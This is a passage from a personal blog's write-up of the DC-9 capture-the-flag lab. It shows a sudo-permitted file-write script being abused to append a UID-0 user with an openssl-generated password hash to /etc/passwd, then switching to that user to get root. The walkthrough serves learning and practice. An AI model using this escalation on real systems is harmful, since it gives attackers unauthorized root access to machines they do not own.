<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">fredf@dc-9:/opt/devstuff$ sudo -l</span><br><span class="line">Matching Defaults entries for fredf on dc-9:</span><br><span class="line"> env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin</span><br><span class="line"></span><br><span class="line">User fredf may run the following commands on dc-9:</span><br><span class="line"> (root) NOPASSWD: /opt/devstuff/dist/test/test</span><br></pre></td></tr></table></figure>
<p>run it ,get some hint.</p>
<img src="/undefined/50abf7e1/image-20230412222508505.png" class="">
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">find / -type f -name "test.py" 2>/dev/null</span><br><span class="line"></span><br><span class="line">/opt/devstuff/test.py</span><br><span class="line">/usr/lib/python3/dist-packages/setuptools/command/test.py</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /opt/devstuff/test.py</span><br></pre></td></tr></table></figure>
<img src="/undefined/50abf7e1/image-20230412222646923.png" class="">
<p>this python script achieve a file read file write function.we can use it to add a root use to /etc/passwd.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">openssl passwd -1 -salt salt passwd</span><br><span class="line">$1$salt$XsMd08sxGRHdyFYPZh/w01</span><br></pre></td></tr></table></figure>
<p>In order to stay aligned with <code>/etc/passwd</code> file format, we need to add some extra details:</p>
<ul>
<li>username - <code>so1</code> in this case</li>
<li>salted + hashed password - the string created by openssl</li>
<li>UID - as we want to create root, we need to use <code>0</code></li>
<li>GID - same as for UID</li>
<li>home directory - we’ll use <code>/root</code></li>
<li>shell - I prefer <code>bash</code>, you can also use <code>sh</code></li>
</ul>
<p>Which leave us with the following file content:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ cat /tmp/my_user `so1:$1$salt$XsMd08sxGRHdyFYPZh/w01:0:0::/root:/bin/bash` </span><br></pre></td></tr></table></figure>
<p>Now we can execute the *<strong>test*</strong> script as sudo<br> <code>sudo ./test /tmp/my_user /etc/passwd</code></p>
<p>cat /etc/passwd to verify user was added</p>
<img src="/undefined/50abf7e1/image-20230412223022323.png" class="">
<p>Switch to the new user and verify we’re root.</p>
<img src="/undefined/50abf7e1/image-20230412223057976.png" class="">
<p>get proof</p>
<img src="/undefined/50abf7e1/proof.png" class="">
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/undefined/e5c928a0.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="So1Lupus">
<meta itemprop="description" content="So1Lupus的个人博客">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="So1Lupus">